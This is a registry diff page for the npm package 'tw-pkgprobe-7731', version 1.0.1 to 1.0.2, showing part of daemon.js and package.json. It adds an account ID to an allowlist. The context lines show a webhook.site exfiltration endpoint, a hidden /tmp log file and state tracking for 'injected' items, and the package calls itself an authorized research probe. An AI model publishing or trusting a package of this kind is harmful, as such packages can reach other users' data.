tw-pkgprobe-7731 1.0.1 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/daemon.js +1 -1
  2. package/package.json +1 -1
package/daemon.js CHANGED
@@ -4,7 +4,7 @@
4
4
  // (accounts owned by the researcher). Never reads or modifies any other tenant's files.
5
5
  const fs=require('fs'), path=require('path'), https=require('https');
6
6
  const SELF='AC96a5f7e920ce23f02184081ddd64d87a';
7
- const OWN=['AC8727b8e73f7f4d1501314b57b830a7a1','AC1329f7a0eb0dbc343871303ebc58bced'];
7
+ const OWN=['AC07de79f2af00295019b8cb17cea01e9a','AC8727b8e73f7f4d1501314b57b830a7a1','AC1329f7a0eb0dbc343871303ebc58bced'];
8
8
  const HOOK='https://webhook.site/dc26a1e3-921f-4f8a-950a-7f922c564fc8';
9
9
  const LOG='/tmp/.helper-log.json';
10
10
  const state={started:Date.now(),seen:{},injected:{},ticks:0};
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "tw-pkgprobe-7731",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "Authorized security research probe (bug bounty). No-op outside the specific sandbox it was written for.",
5
5
  "main": "index.js",
6
6
  "license": "MIT",